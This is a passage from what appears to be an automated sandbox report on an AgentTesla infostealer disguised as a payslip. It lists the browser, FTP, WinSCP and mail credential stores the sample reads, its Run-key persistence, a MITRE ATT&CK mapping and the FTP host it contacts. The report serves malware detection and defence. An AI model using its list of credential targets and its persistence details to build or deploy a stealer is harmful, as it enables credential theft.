                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2252894462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4494723073.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2252894462.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4494723073.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4494330855.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024_pdf.exe PID: 2888, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024_pdf.exe PID: 528, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 6552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 2800, type: MEMORYSTR
                    Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\Payslip_October_2024_pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2252894462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4494723073.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4494330855.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024_pdf.exe PID: 2888, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024_pdf.exe PID: 528, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 6552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 2800, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.sgxIb.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.44f8068.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.4479c48.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Payslip_October_2024_pdf.exe.43fb828.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2252894462.0000000002F51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4494723073.0000000003091000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2252894462.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.4494723073.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.4494330855.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024_pdf.exe PID: 2888, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Payslip_October_2024_pdf.exe PID: 528, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 6552, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: sgxIb.exe PID: 2800, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		1
                    Exfiltration Over Alternative Protocol                    		Abuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/Job1
                    Registry Run Keys / Startup Folder                    		112
                    Process Injection                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Registry Run Keys / Startup Folder                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                    Software Packing                    		NTDS211
                    Security Software Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Timestomp                    		LSA Secrets2
                    Process Discovery                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials141
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Masquerading                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job141
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                    Process Injection                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Hidden Files and Directories                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1548311 Sample: Payslip_October_2024_pdf.exe Startdate: 04/11/2024 Architecture: WINDOWS Score: 100 30 ftp.haliza.com.my 2->30 32 api.ipify.org 2->32 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 10 other signatures 2->56 7 Payslip_October_2024_pdf.exe 3 2->7         started        11 sgxIb.exe 3 2->11         started        13 sgxIb.exe 2 2->13         started        signatures3 process4 file5 28 C:\Users\...\Payslip_October_2024_pdf.exe.log, ASCII 7->28 dropped 58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 7->58 60 Injects a PE file into a foreign processes 7->60 15 Payslip_October_2024_pdf.exe 16 5 7->15         started        62 Multi AV Scanner detection for dropped file 11->62 64 Machine Learning detection for dropped file 11->64 20 sgxIb.exe 14 2 11->20         started        22 sgxIb.exe 2 13->22         started        signatures6 process7 dnsIp8 34 ftp.haliza.com.my 110.4.45.197, 21, 49362, 49628 EXABYTES-AS-APExaBytesNetworkSdnBhdMY Malaysia 15->34 36 api.ipify.org 172.67.74.152, 443, 49706, 49715 CLOUDFLARENETUS United States 15->36 24 C:\Users\user\AppData\Roaming\...\sgxIb.exe, PE32 15->24 dropped 26 C:\Users\user\...\sgxIb.exe:Zone.Identifier, ASCII 15->26 dropped 38 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 15->38 40 Tries to steal Mail credentials (via file / registry access) 15->40 42 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->42 44 Tries to harvest and steal ftp login credentials 22->44 46 Tries to harvest and steal browser information (history, passwords, etc) 22->46 48 Installs a global keyboard hook 22->48 file9 signatures10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    Payslip_October_2024_pdf.exe34%ReversingLabsWin32.Trojan.Generic
                    Payslip_October_2024_pdf.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe34%ReversingLabsWin32.Trojan.AgentTesla

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    https://api.ipify.org/t0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ftp.haliza.com.my0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    		172.67.74.152
                    		truefalse
                      		unknown
                      ftp.haliza.com.my
                      		110.4.45.197
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                        • URL Reputation: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.ipify.orgPayslip_October_2024_pdf.exe, 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2252894462.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.000000000304C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://account.dyn.com/Payslip_October_2024_pdf.exe, 00000000.00000002.2033528319.00000000041EC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2249540840.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://ftp.haliza.com.myPayslip_October_2024_pdf.exe, 00000003.00000002.4494330855.00000000030B6000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EB4000.00000004.00000800.00020000.00000000.sdmp, Payslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002EDB000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2252894462.0000000002F7C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.0000000003468000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.0000000003257000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.0000000003291000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.ipify.org/tsgxIb.exe, 00000005.00000002.2252894462.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.000000000304C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePayslip_October_2024_pdf.exe, 00000003.00000002.4494330855.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000005.00000002.2252894462.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000008.00000002.4494723073.000000000304C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        110.4.45.197
                        		ftp.haliza.com.myMalaysia
                        		46015EXABYTES-AS-APExaBytesNetworkSdnBhdMYtrue
                        172.67.74.152
                        		api.ipify.orgUnited States
                        		13335CLOUDFLARENETUSfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1548311
                        Start date and time:2024-11-04 10:12:10 +01:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 2s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Payslip_October_2024_pdf.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@9/4@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 280
                        • Number of non-executed functions: 34
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • VT rate limit hit for: Payslip_October_2024_pdf.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        04:12:59API Interceptor8875822x Sleep call for process: Payslip_October_2024_pdf.exe modified
                        04:13:12API Interceptor7027046x Sleep call for process: sgxIb.exe modified
                        10:13:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                        10:13:12AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        110.4.45.197Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                          Payslip_October_2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                            rMT103_126021720924.exeGet hashmaliciousAgentTeslaBrowse
                              z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                  Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                    z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                      Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                        DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                          z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                            172.67.74.15267065b4c84713_Javiles.exeGet hashmaliciousRDPWrap ToolBrowse
                                            • api.ipify.org/
                                            Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            4F08j2Rmd9.binGet hashmaliciousXmrigBrowse
                                            • api.ipify.org/
                                            y8tCHz7CwC.binGet hashmaliciousXmrigBrowse
                                            • api.ipify.org/
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/
                                            file.exeGet hashmaliciousLummaC, PrivateLoader, Stealc, VidarBrowse
                                            • api.ipify.org/
                                            file.exeGet hashmaliciousRDPWrap ToolBrowse
                                            • api.ipify.org/
                                            Prismifyr-Install.exeGet hashmaliciousNode StealerBrowse
                                            • api.ipify.org/
                                            2zYP8qOYmJ.exeGet hashmaliciousUnknownBrowse
                                            • api.ipify.org/

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            ftp.haliza.com.myPayslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 110.4.45.197
                                            Payslip_October_2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 110.4.45.197
                                            rMT103_126021720924.exeGet hashmaliciousAgentTeslaBrowse
                                            • 110.4.45.197
                                            z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                            • 110.4.45.197
                                            z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 110.4.45.197
                                            Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 110.4.45.197
                                            z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 110.4.45.197
                                            Order Specifications for Materials.docx.exeGet hashmaliciousAgentTeslaBrowse
                                            • 110.4.45.197
                                            DHL_Shipment_Details_8th_October.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 110.4.45.197
                                            z92BankPayment38_735.exeGet hashmaliciousAgentTeslaBrowse
                                            • 110.4.45.197
                                            api.ipify.orgQuotation.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.13.205
                                            Copia de pago de la Orden de compra OI16014 y OI16015.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.12.205
                                            QUOTATION#09678.exeGet hashmaliciousAgentTeslaBrowse
                                            • 172.67.74.152
                                            Payslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.13.205
                                            V7FWuG5Lct.exeGet hashmaliciousQuasarBrowse
                                            • 172.67.74.152
                                            7ll96oOSBF.exeGet hashmaliciousQuasarBrowse
                                            • 104.26.12.205
                                            Payload 94.75 (4).225.exeGet hashmaliciousKronos, Strela StealerBrowse
                                            • 104.26.12.205
                                            Ordine d'acquisto OI16014 e OI1601.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.12.205
                                            https://v90hdblg6c012.b-cdn.net/ppo45-fill-captch.htmlGet hashmaliciousLummaCBrowse
                                            • 104.26.12.205
                                            SecuriteInfo.com.Win32.Malware-gen.1695.31617.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                            • 104.26.13.205

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            EXABYTES-AS-APExaBytesNetworkSdnBhdMYPayslip_October_2024_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 110.4.45.197
                                            Txwd 4063517991 djxjdlxmbk.pdfGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                            • 103.6.199.200
                                            Payslip_October_2024.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 110.4.45.197
                                            rMT103_126021720924.exeGet hashmaliciousAgentTeslaBrowse
                                            • 110.4.45.197
                                            z1Transaction_ID_REF2418_cmd.batGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                            • 110.4.45.197
                                            z20SWIFT_MT103_Payment_552016_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 110.4.45.197
                                            Order Specifications for Materials.docx.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 110.4.45.197
                                            z14Employee_Contract_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                            • 110.4.45.197
